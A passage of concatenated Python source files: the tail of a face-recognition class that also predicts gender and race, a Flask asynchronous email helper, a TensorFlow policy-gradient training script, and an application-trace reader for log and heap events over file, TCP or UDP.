print('\n\n save_faces_encodings_with_ids function in recognition cannot save ,\n', e)
def add_new_face_encodes(self, face_encoding, save_refresh_rate=5):
'''
add new face encodes and id to the know faces encodes and ids.
new ids will be add as (the last id added / max_id)+1
and the max_id will be updated by max_id=max_id+1
parameters:
face_encoding : new face encoding to append to the known face encodes.
save_refresh_rate : save the known faces and its ids every save_refresh_rate in the filesystem
'''
self.known_face_encodings.append(face_encoding)
if len(self.known_face_ids)==0: # if there no any ids of face encodes added yet, add 0 as the first id
self.known_face_ids.append(0)
face_id = 0
self.max_id=0
else:
face_id = self.max_id+1
self.max_id +=1
self.known_face_ids.append(face_id)
# update and save known faces every (save_refresh_rate) new faces
if self.max_id%save_refresh_rate==0:
save_process = multiprocessing.Process(target=self.save_faces_encodings_with_ids)
save_process.start()
return face_id
def recognize(self, frame, faces_bounding_boxes, recognition_threshold_distance = 0.4, save_rate=1, with_gender_race=True):
'''
try to recognize faces in given images
parameters:
frame : opencv/numpy rgb frame/image
faces_bounding_boxes : detected faces bounding boxes in format (x1, y1, x2, y2)/(left, top, right, bottom)
where (x1, y1) is the upper left corner of the box,(x2, y2) is the lower right corner of the box.
recognition_threshold_distance : verfy 2 faces if the distance between them less than or equal the given threshold
save_rate : the number of faces encodes that the known faces will be saved to the disk after added them to the known faces list
with_gender_race : boolen flag to feed the face encodes to face tags MLP to predict the gender and race of face
returns:
detected_faces_ids : list contains the recognized faces ids
'''
detected_faces_ids = []
if len(faces_bounding_boxes)> 0:
face_locations = [(top, right, bottom, left) for [left, top, right, bottom] in faces_bounding_boxes]
# get 1D list contains 128 encodes for each face founded in given frame
face_encodings, raw_landmarks = face_recognition.face_encodings(frame, face_locations)
# if settings.Debug:
# print("\nfaceencodes and land marks\n", (face_encodings, raw_landmarks))
# get face tags
if with_gender_race:
faces_tags = self.faceTagModel.predict_proba(face_encodings)
else:
faces_tags= [None for _ in range(len(face_encodings))]
# if settings.Debug:
# print("\nface tags\n", faces_tags)
# container to contain the result of trying to recognize each face
#loop over each face encodes found
genders_list, races_list = [],[]
for face_encoding, tag in zip(face_encodings, faces_tags):
#get tags
try:
gender, race = self.get_tags(tag)
genders_list.append(gender)
races_list.append(race)
except:
pass
# See if the face is matching any of known face(s)
# use the known face with the smallest distance to the new face
if len(self.known_face_encodings)==0:
face_id = self.add_new_face_encodes(face_encoding, save_refresh_rate=save_rate)
else:
face_distances = face_recognition.face_distance(self.known_face_encodings, face_encoding)
best_match_index, min_distance = None, None
if len(face_distances) > 0: #if not that there is no any known face yet
best_match_index = np.argmin(face_distances)
min_distance = np.min(face_distances)
# check if the best match is less than or equal the given threshold
if min_distance <= recognition_threshold_distance:
# get the corrosponding id of the matched face
face_id = self.known_face_ids[best_match_index]
# if the distance is very close to the threshold
# then add the face encodes to avoid miss recognise it later
if(recognition_threshold_distance-min_distance <= recognition_threshold_distance/2.0):
self.known_face_encodings.append(face_encoding)
self.known_face_ids.append(face_id)
else:
# if the distance is not less than or equal the given threshold
face_id = self.add_new_face_encodes(face_encoding, save_refresh_rate=save_rate)
if face_id!=None:
detected_faces_ids.append(face_id)
return detected_faces_ids, raw_landmarks, face_encodings, genders_list, races_list
def get_tags(self,face_tags_probs):
'''
get gender and race based on predicted probabily of MLP tags model
parameters :
face_tags_probs : (numpy array) contains the prediction probabilty
returns :
gender, race
'''
gender = "Male" if face_tags_probs[0]>=0.5 else "Female"
race = self.faceTagsLabels[1:4][np.argmax(face_tags_probs[1:4])]
return gender, race
def load_faceTag_model(self, face_tag_model_path):
"""
load the pickeled face tags model
prameters:
face_tag_model_path : (string) contains the path of pickled model
returns:
clf : MLP model
labels: 70 labels the model can predict
"""
with open(face_tag_model_path, 'rb') as f:
clf, labels = pickle.load(f, encoding='latin1')
return clf, labels
|
email.py
|
from . import mail
from flask_mail import Message
from flask import current_app, render_template
from threading import Thread
"""La funzione mail.send() blocca l’applicazione durante l’operazione di spedizione.
Per questo l’operazione stessa viene delegata ad un thread che lavora in background,
evitando che il browser e tutta l’applicazione rimangano in attesa."""
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(subject, sender=app.config["MAIL_USERNAME"], recipients=[to])
# Si invia o msg.html o msg.body che sono la stessa cosa
msg.body = render_template(template + ".txt", **kwargs)
msg.html = render_template(template + ".html", **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
train_pg_v2.py
|
import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
from multiprocessing import Process
import shutil
class MyArgument(object):
def __init__(self,
exp_name='vpg',
env_name='CartPole-v1',
n_iter=100,
gamma=.99,
min_batch_size=1000,
max_path_length=None,
learning_rate=1e-3,
reward_to_go=True,
render=False,
normalize_advantage=True,
nn_baseline=True,
seed=1,
n_layers=1,
size=32,
debug=False,
max_loss=100):
self.exp_name = exp_name
self.env_name = env_name
self.n_iter = n_iter
self.gamma = gamma
self.min_batch_size = min_batch_size
self.max_path_length = max_path_length
self.learning_rate = learning_rate
self.reward_to_go = reward_to_go
self.render = render
self.debug = debug
self.max_loss = max_loss
self.normalize_advantage = normalize_advantage
self.nn_baseline = nn_baseline
self.seed = seed
self.n_layers = n_layers
self.size = size
base_dir = '/tmp/pg/%s' % self.env_name
self.log_dir = 'bl_' if self.nn_baseline else ''
self.log_dir += 'rtg_' if self.reward_to_go else ''
self.log_dir += 'norm_' if self.normalize_advantage else ''
self.log_dir += 'nn_%d_%d_' % (self.n_layers, self.size)
self.log_dir += 'lr_%6f_' % self.learning_rate
self.log_dir += 'batch_%d_' % self.min_batch_size
self.log_dir += 't_%d' % self.max_loss
self.log_dir = os.path.join(base_dir, self.log_dir)
self.log_dir = os.path.join(self.log_dir, 'seed%d' % self.seed)
class PgModel(object):
def __init__(self, env, n_layers, size, learning_rate, nn_baseline, debug):
self.observation_dim = env.observation_space.shape[0]
self.ph_observation = tf.placeholder(shape=[None, self.observation_dim], name="Observation", dtype=tf.float32)
self.ph_advance = tf.placeholder(shape=[None], name='advance', dtype=tf.float32)
self.nn_baseline = nn_baseline
self.ph_q_value = tf.placeholder(shape=[None], name='QValue', dtype=tf.float32)
self.debug = debug
if self.debug:
self.ph_mean_reward = tf.placeholder(name="reward", dtype=tf.float32)
tf.summary.scalar("MeanReward", self.ph_mean_reward)
self.predict_action = None
self.critic_opt = None
self.actor_opt = None
self.ph_action = None
self.predict_baseline = None
self.merged = None
self.critic_loss = None
@staticmethod
def build_mlp(input_placeholder, output_size, scope,
n_layers=2, size=64, activation=tf.nn.relu, output_activation=None):
with tf.variable_scope(scope):
x = tf.keras.Input(tensor=input_placeholder)
for i in range(n_layers):
x = tf.keras.layers.Dense(units=size, activation=activation)(x)
x = tf.keras.layers.Dense(units=output_size, activation=output_activation)(x)
return x
def get_predict_action(self, sess, observation):
action = sess.run(self.predict_action, feed_dict={self.ph_observation: observation[None]})
return action[0]
def update(self, sess, observations, actions, q, normalize_advance, mean_reward, max_loss):
if self.nn_baseline:
# Update Cirtic Network
baseline = sess.run(self.predict_baseline, feed_dict={self.ph_observation: observations})
updated_baseline = baseline * .9 + q * .1
sess.run([self.critic_opt], feed_dict={self.ph_observation: observations,
self.ph_q_value: updated_baseline})
advance = q - baseline
else:
advance = q.copy()
if normalize_advance:
advance = (advance - np.mean(advance)) / (np.std(advance) + 1e-8)
# Update the Actor network
if self.debug:
_, summary = sess.run([self.action_opt, self.merged], feed_dict={self.ph_observation: observations,
self.ph_action: actions,
self.ph_advance: advance,
self.ph_q_value: q,
self.ph_mean_reward: mean_reward})
else:
sess.run(self.action_opt, feed_dict={self.ph_observation: observations,
self.ph_action: actions,
self.ph_advance: advance})
summary = None
return summary
class PgModelContinuous(PgModel):
def __init__(self, env, n_layers, size, learning_rate, nn_baseline, debug):
super().__init__(env, n_layers, size, learning_rate, nn_baseline, debug)
self.action_dim = env.action_space.shape[0]
self.ph_action = tf.placeholder(shape=[None, self.action_dim], name="Action", dtype=tf.float32)
# Define the Actor Model
with tf.variable_scope("Actor"):
# N x action dim
# Output activation ?
self.action_mean = self.build_mlp(input_placeholder=self.ph_observation,
output_size=self.action_dim,
scope="Mean_%d_%d" % (n_layers, size),
size=size,
n_layers=n_layers,
activation=tf.nn.relu,
output_activation=None)
# action dim
# self.action_sigma = tf.get_variable(name='Sigma', shape=[self.action_dim],
# dtype=tf.float32, trainable=True, initializer=tf.ones_initializer())
self.action_sigma = self.build_mlp(input_placeholder=self.ph_observation,
output_size=self.action_dim,
scope="Sigma_%d_%d" % (n_layers, size),
size=32,
n_layers=1,
activation=tf.nn.relu,
output_activation=tf.nn.sigmoid)
tf.summary.histogram('Mean', self.action_mean)
tf.summary.histogram('Std', self.action_sigma)
# Broadcast expected here
# Get N x action dim distributions
self.normal_dist = tf.distributions.Normal(self.action_mean, (self.action_sigma + 1e-8),
name="PredictDistribution")
# Expected N* action dis distributions
self.predict_action = self.normal_dist.sample(name="PredictAction")
# self.predict_action = tf.clip_by_value(normal_dist.sample(), env.action_space.low, env.action_space.high,
# name="PredictAction")
with tf.name_scope("Loss"):
self.action_prob = self.normal_dist.log_prob(self.ph_action, name="Prob")
self.actor_loss = - tf.reduce_mean(self.action_prob * tf.expand_dims(self.ph_advance, -1))
tf.summary.scalar('Actor Loss', self.actor_loss)
with tf.name_scope("Opt/"):
self.action_opt = tf.train.AdamOptimizer(learning_rate).minimize(self.actor_loss)
# Define the Critic Model
if nn_baseline:
with tf.name_scope("Critic"):
self.predict_baseline_2d = self.build_mlp(input_placeholder=self.ph_observation,
output_size=1,
scope="NN_%d_%d" % (n_layers, size),
n_layers=n_layers,
size=size,
activation=tf.nn.relu)
self.predict_baseline = tf.squeeze(self.predict_baseline_2d, axis=1, name="PredictBaseline")
with tf.name_scope("Loss"):
self.critic_loss = tf.losses.mean_squared_error(self.ph_q_value, self.predict_baseline)
tf.summary.scalar('Critic Loss', self.critic_loss)
with tf.name_scope("Opt/"):
self.critic_opt = tf.train.AdamOptimizer(learning_rate).minimize(self.critic_loss)
weights = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
for w in weights:
tf.summary.histogram(w.name, w)
self.merged = tf.summary.merge_all()
class PgModelDiscrete(PgModel):
def __init__(self, env, n_layers, size, learning_rate, nn_baseline, debug):
super().__init__(env, n_layers, size, learning_rate, nn_baseline, debug)
self.action_dim = env.action_space.n
self.ph_action = tf.placeholder(shape=[None], name="Action", dtype=tf.int32)
# Define the Actor Model
with tf.name_scope("Actor"):
self.action_logist = self.build_mlp(input_placeholder=self.ph_observation,
output_size=self.action_dim, scope="NN_%d_%d" % (n_layers, size),
size=size, n_layers=n_layers)
self.predict_action_2d = tf.multinomial(self.action_logist, 1)
self.predict_action = tf.squeeze(self.predict_action_2d, axis=1, name="PredictAction")
self.batch_size = tf.shape(self.ph_observation)[0]
with tf.name_scope('Loss'):
indices = tf.stack([tf.range(self.batch_size), self.ph_action], axis=1)
action_prob = tf.gather_nd(tf.nn.softmax(self.action_logist), indices)
self.actor_loss = tf.reduce_mean(-tf.log(action_prob) * self.ph_advance)
tf.summary.scalar('Actor loss', self.actor_loss)
with tf.name_scope("Opt/"):
self.action_opt = tf.train.AdamOptimizer(learning_rate).minimize(self.actor_loss)
# Define the Critic Model
if nn_baseline:
with tf.name_scope("Critic"):
self.predict_baseline_2d = self.build_mlp(input_placeholder=self.ph_observation,
output_size=1,
scope="NN_%d_%d" % (n_layers, size),
n_layers=n_layers,
size=size,
activation=tf.nn.relu)
self.predict_baseline = tf.squeeze(self.predict_baseline_2d, axis=1, name="PredictBaseline")
with tf.name_scope("Loss"):
self.critic_loss = tf.losses.mean_squared_error(self.ph_q_value, self.predict_baseline)
tf.summary.scalar('Critic Loss', self.critic_loss)
with tf.name_scope("Opt/"):
self.critic_opt = tf.train.AdamOptimizer(learning_rate).minimize(self.critic_loss)
weights = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
for w in weights:
tf.summary.histogram(w.name, w)
self.merged = tf.summary.merge_all()
def discount_reward(paths, gamma, reward_to_go):
if reward_to_go:
discounted_reward = []
for path in paths:
path_len = len(path['reward'])
discount_factor = [1 * (gamma ** i) for i in range(path_len)]
for i in range(path_len):
discounted_reward.append(
np.sum(np.array(path['reward'][i:]) * np.array(discount_factor[:path_len - i])))
else:
discounted_reward = []
for path in paths:
ret_tau = 0
discount_factor = 1
for reward in path['reward']:
ret_tau += reward * discount_factor
discount_factor *= gamma
discounted_reward.extend([ret_tau for i in range(len(path['reward']))])
q_n = np.array(discounted_reward, dtype=np.float32)
return q_n
def verify_model(sess, model, env):
action_dim = env.action_space.shape[0]
observation_dim = env.observation_space.shape[0]
observations = np.random.randn(observation_dim)
print("Observation shape:", observations.shape)
print(observations)
actions = model.get_predict_action(sess, observations)
print("action shape:", actions.shape)
print(actions)
assert actions.shape == (action_dim,)
N = 10
observations = np.random.randn(N, observation_dim)
print("Observation shape:", observations.shape)
print(observations)
predict_action = sess.run(model.predict_action, feed_dict={model.ph_observation: observations})
print("Action shape:", predict_action.shape)
print(predict_action)
assert predict_action.shape == (N, action_dim)
action_prob = sess.run(model.action_prob, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action})
print("Prob:", action_prob)
assert action_prob.shape == (N, action_dim)
loss = sess.run(model.actor_loss, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action,
model.ph_advance: np.ones(N)})
print("Loss:", loss)
for i in range(20):
sess.run(model.action_opt, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action,
model.ph_advance: np.ones(N)})
action_prob2 = sess.run(model.action_prob, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action})
print("Prob2:", action_prob2)
assert action_prob2.shape == (N, action_dim)
loss2 = sess.run(model.actor_loss, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action,
model.ph_advance: np.ones(N)})
print("Loss2:", loss2)
assert loss2 < loss
print(np.sum(action_prob2 > action_prob))
assert np.sum(action_prob2 > action_prob) == N * action_dim
def train_pg(args):
if os.path.exists(args.log_dir):
shutil.rmtree(args.log_dir)
logz.configure_output_dir(args.log_dir)
logz.save_params(args.__dict__)
# Set random seeds
tf.set_random_seed(args.seed)
np.random.seed(args.seed)
# Make the gym environment
env = gym.make(args.env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
if discrete:
model = PgModelDiscrete(env, args.n_layers, args.size, args.learning_rate, args.nn_baseline, debug=args.debug)
else:
model = PgModelContinuous(env, args.n_layers, args.size, args.learning_rate, args.nn_baseline, debug=args.debug)
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() # pylint: disable=E1101
writer = tf.summary.FileWriter(args.log_dir, sess.graph)
# if not discrete:
# verify_model(sess, model, env)
max_path_length = args.max_path_length or env.spec.max_episode_steps
start = time.time()
for itr in range(args.n_iter):
end = time.time()
cost = end - start
start = end
if itr > 0:
if itr == 1:
mean_cost = cost
else:
mean_cost = .9 * mean_cost + .1 * cost
print("Time: %1f " % mean_cost, "Togo:%1f min" % ((args.n_iter - itr) * mean_cost / 60))
print("********** Iteration %i ************" % itr)
time_steps_this_batch = 0
paths = []
while True:
observation = env.reset()
obs, acs, rewards = [], [], []
render_this_episode = (len(paths) == 0 and (itr % 10 == 0) and args.render)
path_steps = 0
while True:
if render_this_episode:
env.render()
time.sleep(0.0001)
obs.append(observation)
action = model.get_predict_action(sess, observation)
acs.append(action)
observation, rew, done, _ = env.step(action)
rewards.append(rew)
path_steps += 1
if done or path_steps > max_path_length:
break
path = {"observation": np.array(obs),
"reward": np.array(rewards),
"action": np.array(acs)}
paths.append(path)
time_steps_this_batch += len(obs)
if time_steps_this_batch > args.min_batch_size:
break
path_reward = [sum(path['reward']) for path in paths]
mean_reward = sum(path_reward) / len(path_reward)
print("Average Reward:", mean_reward)
ob_batch = np.concatenate([path["observation"] for path in paths])
ac_batch = np.concatenate([path["action"] for path in paths])
q_batch = discount_reward(paths, args.gamma, args.reward_to_go)
summary = model.update(sess, observations=ob_batch, actions=ac_batch,
q=q_batch, normalize_advance=args.normalize_advantage,
mean_reward=mean_reward, max_loss=args.max_loss)
if args.debug:
writer.add_summary(summary, itr)
logz.pickle_tf_vars()
def main():
for baseline in [True]:
for normalize in [True]:
for reward_to_go in [True]:
for min_batch in [10000]:
for lr in [1e-2]:
for max_loss in [1e6]:
for seed in [23]:
# env_name = 'CartPole-v0'
# env_name = 'MountainCar-v0'
# env_name = 'MountainCarContinuous-v0'
env_name = 'InvertedPendulum-v1'
# env_name = "Ant-v1"
env_name = 'HalfCheetah-v1'
args = MyArgument(env_name=env_name,
seed=seed,
debug=True,
n_layers=3,
size=64,
reward_to_go=reward_to_go,
normalize_advantage=normalize,
nn_baseline=baseline,
n_iter=1200,
learning_rate=lr,
render=False,
max_path_length=500,
min_batch_size=min_batch,
max_loss=max_loss)
p = Process(target=train_pg, args=(args,))
p.start()
p.join()
if __name__ == "__main__":
main()
|
apptrace.py
|
import os
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
import threading
import tempfile
import time
import subprocess
import os.path
import elftools.elf.elffile as elffile
import elftools.elf.constants as elfconst
def addr2line(toolchain, elf_path, addr):
"""
Creates trace reader.
Parameters
----------
toolchain : string
toolchain prefix to retrieve source line locations using addresses
elf_path : string
path to ELF file to use
addr : int
address to retrieve source line location
Returns
-------
string
source line location string
"""
try:
return subprocess.check_output(['%saddr2line' % toolchain, '-e', elf_path, '0x%x' % addr]).decode("utf-8")
except subprocess.CalledProcessError:
return ''
class ParseError(RuntimeError):
"""
Parse error exception
"""
def __init__(self, message):
RuntimeError.__init__(self, message)
class ReaderError(RuntimeError):
"""
Trace reader error exception
"""
def __init__(self, message):
RuntimeError.__init__(self, message)
class ReaderTimeoutError(ReaderError):
"""
Trace reader timeout error
"""
def __init__(self, tmo, sz):
ReaderError.__init__(self, 'Timeout %f sec while reading %d bytes!' % (tmo, sz))
class ReaderShutdownRequest(ReaderError):
"""
Trace reader shutdown request error
Raised when user presses CTRL+C (SIGINT).
"""
def __init__(self):
ReaderError.__init__(self, 'Shutdown request!')
class Reader:
"""
Base abstract reader class
"""
def __init__(self, tmo):
"""
Constructor
Parameters
----------
tmo : int
read timeout
"""
self.timeout = tmo
self.need_stop = False
def read(self, sz):
"""
Reads a number of bytes
Parameters
----------
sz : int
number of bytes to read
Returns
-------
bytes object
read bytes
Returns
-------
ReaderTimeoutError
if timeout expires
ReaderShutdownRequest
if SIGINT was received during reading
"""
pass
def readline(self):
"""
Reads line
Parameters
----------
sz : int
number of bytes to read
Returns
-------
string
read line
"""
pass
def forward(self, sz):
"""
Moves read pointer to a number of bytes
Parameters
----------
sz : int
number of bytes to read
"""
pass
def cleanup(self):
"""
Cleans up reader
"""
self.need_stop = True
class FileReader(Reader):
"""
File reader class
"""
def __init__(self, path, tmo):
"""
Constructor
Parameters
----------
path : string
path to file to read
tmo : int
see Reader.__init__()
"""
Reader.__init__(self, tmo)
self.trace_file_path = path
self.trace_file = open(path, 'rb')
def read(self, sz):
"""
see Reader.read()
"""
data = b''
start_tm = time.clock()
while not self.need_stop:
data += self.trace_file.read(sz - len(data))
if len(data) == sz:
break
if self.timeout != -1 and time.clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, sz)
if self.need_stop:
raise ReaderShutdownRequest()
return data
def get_pos(self):
"""
Retrieves current file read position
Returns
-------
int
read position
"""
return self.trace_file.tell()
def readline(self, linesep=os.linesep):
"""
see Reader.read()
"""
line = ''
start_tm = time.clock()
while not self.need_stop:
line += self.trace_file.readline().decode("utf-8")
if line.endswith(linesep):
break
if self.timeout != -1 and time.clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, 1)
if self.need_stop:
raise ReaderShutdownRequest()
return line
def forward(self, sz):
"""
see Reader.read()
"""
cur_pos = self.trace_file.tell()
start_tm = time.clock()
while not self.need_stop:
file_sz = os.path.getsize(self.trace_file_path)
if file_sz - cur_pos >= sz:
break
if self.timeout != -1 and time.clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, sz)
if self.need_stop:
raise ReaderShutdownRequest()
self.trace_file.seek(sz, os.SEEK_CUR)
class NetRequestHandler:
"""
Handler for incoming network requests (connections, datagrams)
"""
def handle(self):
while not self.server.need_stop:
data = self.rfile.read(1024)
if len(data) == 0:
break
self.server.wtrace.write(data)
self.server.wtrace.flush()
class NetReader(FileReader):
"""
Base netwoek socket reader class
"""
def __init__(self, tmo):
"""
see Reader.__init__()
"""
fhnd,fname = tempfile.mkstemp()
FileReader.__init__(self, fname, tmo)
self.wtrace = os.fdopen(fhnd, 'wb')
self.server_thread = threading.Thread(target=self.serve_forever)
self.server_thread.start()
def cleanup(self):
"""
see Reader.cleanup()
"""
FileReader.cleanup(self)
self.shutdown()
self.server_close()
self.server_thread.join()
time.sleep(0.1)
self.trace_file.close()
self.wtrace.close()
class TCPRequestHandler(NetRequestHandler, SocketServer.StreamRequestHandler):
"""
Handler for incoming TCP connections
"""
pass
class TCPReader(NetReader, SocketServer.TCPServer):
"""
TCP socket reader class
"""
def __init__(self, host, port, tmo):
"""
Constructor
Parameters
----------
host : string
see SocketServer.BaseServer.__init__()
port : int
see SocketServer.BaseServer.__init__()
tmo : int
see Reader.__init__()
"""
SocketServer.TCPServer.__init__(self, (host, port), TCPRequestHandler)
NetReader.__init__(self, tmo)
class UDPRequestHandler(NetRequestHandler, SocketServer.DatagramRequestHandler):
"""
Handler for incoming UDP datagrams
"""
pass
class UDPReader(NetReader, SocketServer.UDPServer):
"""
UDP socket reader class
"""
def __init__(self, host, port, tmo):
"""
Constructor
Parameters
----------
host : string
see SocketServer.BaseServer.__init__()
port : int
see SocketServer.BaseServer.__init__()
tmo : int
see Reader.__init__()
"""
SocketServer.UDPServer.__init__(self, (host, port), UDPRequestHandler)
NetReader.__init__(self, tmo)
def reader_create(trc_src, tmo):
"""
Creates trace reader.
Parameters
----------
trc_src : string
trace source URL. Supports 'file:///path/to/file' or (tcp|udp)://host:port
tmo : int
read timeout
Returns
-------
Reader
reader object or None if URL scheme is not supported
"""
url = urlparse(trc_src)
if len(url.scheme) == 0 or url.scheme == 'file':
if os.name == 'nt':
# workaround for Windows path
return FileReader(trc_src[7:], tmo)
else:
return FileReader(url.path, tmo)
if url.scheme == 'tcp':
return TCPReader(url.hostname, url.port, tmo)
if url.scheme == 'udp':
return UDPReader(url.hostname, url.port, tmo)
return None
class TraceDataProcessor:
"""
Base abstract class for all trace data processors.
"""
def __init__(self, print_events, keep_all_events=False):
"""
Constructor.
Parameters
----------
print_events : bool
if True every event will be printed as they arrive
keep_all_events : bool
if True all events will be kept in self.events in the order they arrive
"""
self.print_events = print_events
self.keep_all_events = keep_all_events
self.total_events = 0
self.events = []
# This can be changed by the root procesor that includes several sub-processors.
# It is used access some method of root processor which can contain methods/data common for all sub-processors.
# Common info could be current execution context, info about running tasks, available IRQs etc.
self.root_proc = self
def _print_event(self, event):
"""
Base method to print an event.
Parameters
----------
event : object
Event object
"""
print("EVENT[{:d}]: {}".format(self.total_events, event))
def print_report(self):
"""
Base method to print report.
"""
print("Processed {:d} events".format(self.total_events))
def cleanup(self):
"""
Base method to make cleanups.
"""
pass
def on_new_event(self, event):
"""
Base method to process event.
"""
if self.print_events:
self._print_event(event)
if self.keep_all_events:
self.events.append(event)
self.total_events += 1
class LogTraceParseError(ParseError):
"""
Log trace parse error exception.
"""
pass
def get_str_from_elf(felf, str_addr):
"""
Retrieves string from ELF file.
Parameters
----------
felf : elffile.ELFFile
open ELF file handle to retrive format string from
str_addr : int
address of the string
Returns
-------
string
string or None if it was not found
"""
tgt_str = ''
for sect in felf.iter_sections():
if sect['sh_addr'] == 0 or (sect['sh_flags'] & elfconst.SH_FLAGS.SHF_ALLOC) == 0:
continue
if str_addr < sect['sh_addr'] or str_addr >= sect['sh_addr'] + sect['sh_size']:
continue
sec_data = sect.data()
for i in range(str_addr - sect['sh_addr'], sect['sh_size']):
if type(sec_data) is str:
ch = sec_data[i]
else:
ch = str(chr(sec_data[i]))
if ch == '\0':
break
tgt_str += ch
if len(tgt_str) > 0:
return tgt_str
return None
class LogTraceEvent:
"""
Log trace event.
"""
def __init__(self, fmt_addr, log_args):
"""
Constructor.
Parameters
----------
fmt_addr : int
address of the format string
log_args : list
list of log message arguments
"""
self.fmt_addr = fmt_addr
self.args = log_args
def get_message(self, felf):
"""
Retrieves log message.
Parameters
----------
felf : elffile.ELFFile
open ELF file handle to retrive format string from
Returns
-------
string
formatted log message
Raises
------
LogTraceParseError
if format string has not been found in ELF file
"""
fmt_str = get_str_from_elf(felf, self.fmt_addr)
if not fmt_str:
raise LogTraceParseError('Failed to find format string for 0x%x' % self.fmt_addr)
prcnt_idx = 0
for i, arg in enumerate(self.args):
prcnt_idx = fmt_str.find('%', prcnt_idx, -2) # TODO: check str ending with %
if prcnt_idx == -1:
break
prcnt_idx += 1 # goto next char
if fmt_str[prcnt_idx] == 's':
# find string
arg_str = get_str_from_elf(felf, self.args[i])
if arg_str:
self.args[i] = arg_str
else:
self.args[i] = '<None>'
fmt_str = fmt_str.replace('%p', '%x')
return fmt_str % tuple(self.args)
class BaseLogTraceDataProcessorImpl:
"""
Base implementation for log data processors.
"""
def __init__(self, print_log_events=False, elf_path=''):
"""
Constructor.
Parameters
----------
print_log_events : bool
if True every log event will be printed as they arrive
elf_path : string
path to ELF file to retrieve format strings for log messages
"""
if len(elf_path):
self.felf = elffile.ELFFile(open(elf_path, 'rb'))
else:
self.felf = None
self.print_log_events = print_log_events
self.messages = []
def cleanup(self):
"""
Cleanup
"""
if self.felf:
self.felf.stream.close()
def print_report(self):
"""
Prints log report
"""
print("=============== LOG TRACE REPORT ===============")
print("Processed {:d} log messages.".format(len(self.messages)))
def on_new_event(self, event):
"""
Processes log events.
Parameters
----------
event : LogTraceEvent
Event object.
"""
msg = event.get_message(self.felf)
self.messages.append(msg)
if self.print_log_events:
print(msg),
class HeapTraceParseError(ParseError):
"""
Heap trace parse error exception.
"""
pass
class HeapTraceDuplicateAllocError(HeapTraceParseError):
"""
Heap trace duplicate allocation error exception.
"""
def __init__(self, addr, new_size, prev_size):
"""
Constructor.
Parameters
----------
addr : int
memory block address
new_size : int
size of the new allocation
prev_size : int
size of the previous allocation
"""
HeapTraceParseError.__init__(self, """Duplicate alloc @ 0x{:x}!
New alloc is {:d} bytes,
previous is {:d} bytes.""".format(addr, new_size, prev_size))
class HeapTraceEvent:
"""
Heap trace event.
"""
def __init__(self, ctx_name, in_irq, core_id, ts, alloc, size, addr, callers, toolchain='', elf_path=''):
"""
Constructor.
Parameters
----------
ctx_name : string
name of event context (task or IRQ name)
in_irq : bool
True if event has been generated in IRQ context, otherwise False
core_id : int
core which generated the event
ts : float
event timestamp
alloc : bool
True for allocation event, otherwise False
size : int
size of allocation; has no meaning for de-allocation event
addr : int
address of allocation/de-allocation
callers : list
list of callers (callstack) for event
toolchain_pref : string
toolchain prefix to retrieve source line locations using addresses
elf_path : string
path to ELF file to retrieve format strings for log messages
"""
self.ctx_name = ctx_name
self.in_irq = in_irq
self.core_id = core_id
self.ts = ts
self.alloc = alloc
self.size = size
self.addr = addr
self.callers = callers
self.toolchain = toolchain
self.elf_path = elf_path
def __repr__(self):
if len(self.toolchain) and len(self.elf_path):
callers = os.linesep
for addr in self.callers:
callers += '{}'.format(addr2line(self.toolchain, self.elf_path, addr))
else:
callers = ''
for addr in self.callers:
if len(callers):
callers += ':'
callers += '0x{:x}'.format(addr)
if self.in_irq:
ctx_desc = 'IRQ "%s"' % self.ctx_name
else:
ctx_desc = 'task "%s"' % self.ctx_name
if self.alloc:
return "[{:.9f}] HEAP: Allocated {:d} bytes @ 0x{:x} from {} on core {:d} by: {}".format(self.ts, self.size,
self.addr, ctx_desc,
self.core_id, callers)
else:
return "[{:.9f}] HEAP: Freed bytes @ 0x{:x} from {} on core {:d} by: {}".format(self.ts, self.addr, ctx_desc,
self.core_id, callers)
class BaseHeapTraceDataProcessorImpl:
"""
Base implementation for heap data processors.
"""
def __init__(self, print_heap_events=False):
"""
Constructor.
Parameters
----------
print_heap_events : bool
if True every heap event will be printed as they arrive
"""
self._alloc_addrs = {}
self.allocs = []
self.frees = []
self.heap_events_count = 0
self.print_heap_events = print_heap_events
def on_new_event(self, event):
"""
Processes heap events. Keeps track of active allocations list.
Parameters
----------
event : HeapTraceEvent
Event object.
"""
self.heap_events_count += 1
if self.print_heap_events:
print(event)
if event.alloc:
if event.addr in self._alloc_addrs:
raise HeapTraceDuplicateAllocError(event.addr, event.size, self._alloc_addrs[event.addr].size)
self.allocs.append(event)
self._alloc_addrs[event.addr] = event
else:
# do not treat free on unknown addresses as errors, because these blocks coould be allocated when tracing was disabled
if event.addr in self._alloc_addrs:
event.size = self._alloc_addrs[event.addr].size
self.allocs.remove(self._alloc_addrs[event.addr])
del self._alloc_addrs[event.addr]
else:
self.frees.append(event)
def print_report(self):
"""
Prints heap report
"""
print("=============== HEAP TRACE REPORT ===============")
print("Processed {:d} heap events.".format(self.heap_events_count))
if len(self.allocs) == 0:
print("OK - Heap errors was not found.")
return
leaked_bytes = 0
for alloc in self.allocs:
leaked_bytes += alloc.size
print(alloc)
for free in self.frees:
if free.addr > alloc.addr and free.addr <= alloc.addr + alloc.size:
print("Possible wrong free operation found")
print(free)
print("Found {:d} leaked bytes in {:d} blocks.".format(leaked_bytes, len(self.allocs)))
|
isulogger.py
|
"""
ISULOG client
"""
